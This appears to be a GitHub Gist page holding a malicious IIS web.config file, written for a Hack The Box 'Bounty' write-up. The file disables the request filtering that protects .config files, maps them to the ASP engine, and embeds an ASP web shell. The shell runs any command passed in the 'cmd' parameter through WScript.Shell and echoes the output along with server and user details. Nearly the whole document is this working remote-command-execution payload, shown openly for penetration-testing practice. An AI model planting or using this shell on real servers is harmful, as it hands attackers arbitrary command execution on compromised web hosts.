Last active
August 9, 2019 15:27
-
-
Save Ge0rg3/19235a8224fca1b08cb627bbc5cda0c3 to your computer and use it in GitHub Desktop.
Written for my Bounty HTB Write-up. Bodged together from other areas of the internet (most notably https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp & https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<configuration> | |
<system.webServer> | |
<handlers accessPolicy="Read, Script, Write"> | |
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
</handlers> | |
<security> | |
<requestFiltering> | |
<fileExtensions> | |
<remove fileExtension=".config" /> | |
</fileExtensions> | |
<hiddenSegments> | |
<remove segment="web.config" /> | |
</hiddenSegments> | |
</requestFiltering> | |
</security> | |
</system.webServer> | |
</configuration> | |
<% | |
Set oScript = Server.CreateObject("WSCRIPT.SHELL") | |
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") | |
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") | |
Function getCommandOutput(theCommand) | |
Dim objShell, objCmdExec | |
Set objShell = CreateObject("WScript.Shell") | |
Set objCmdExec = objshell.exec(thecommand) | |
getCommandOutput = objCmdExec.StdOut.ReadAll | |
end Function | |
%> | |
<FORM action="" method="GET"> | |
<input type="text" name="cmd" size=45 value="<%= szCMD %>"> | |
<input type="submit" value="Run"> | |
</FORM> | |
<PRE> | |
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> | |
<%Response.Write(Request.ServerVariables("server_name"))%> | |
<p> | |
<b>The server's port:</b> | |
<%Response.Write(Request.ServerVariables("server_port"))%> | |
</p> | |
<p> | |
<b>The server's software:</b> | |
<%Response.Write(Request.ServerVariables("server_software"))%> | |
</p> | |
<p> | |
<b>The server's software:</b> | |
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%> | |
<% szCMD = request("cmd") | |
thisDir = getCommandOutput("cmd /c" & szCMD) | |
Response.Write(thisDir)%> | |
</p> | |
<br> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment